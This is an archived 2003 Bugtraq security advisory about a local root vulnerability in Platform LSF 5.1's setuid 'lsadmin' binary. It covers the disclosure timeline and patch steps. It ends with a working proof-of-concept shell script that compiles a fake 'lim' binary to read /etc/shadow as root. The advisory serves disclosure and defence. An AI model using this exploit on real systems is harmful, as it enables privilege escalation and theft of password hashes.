lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0305221500440.1821-100000@rubycon.man.szczecin.pl>
Date: Thu, 22 May 2003 15:31:22 +0200 (CEST)
From: Tomasz Grabowski <cadence@...llo.aci.com.pl>
To: bugtraq@...urityfocus.com
Subject: Security advisory: LSF 5.1 local root exploit



	             Security Advisory

	                22 May 2003

	           Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadence@....com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root priviledge by forcing the 'lsadmin'
	binary to execute code of attackers choice. The 'lsadmin' binary
	is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check the
correctness of config files. Right after it starts, it is using the
external 'lim' binary . It is using the LSF_SERVERDIR variable in lsf.conf
file to obtain a path for 'lim' binary. Regular user can make his own
lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of default /etc/lsf.conf file. Attacker can therefore point
the LSF_SERVERDIR variable to his own 'lim' binary.  The attackers 'lim'
binary will be executed with setuid root priviledges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact
support@...tform.com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
support@...tform.com



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@....szczecin.pl




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ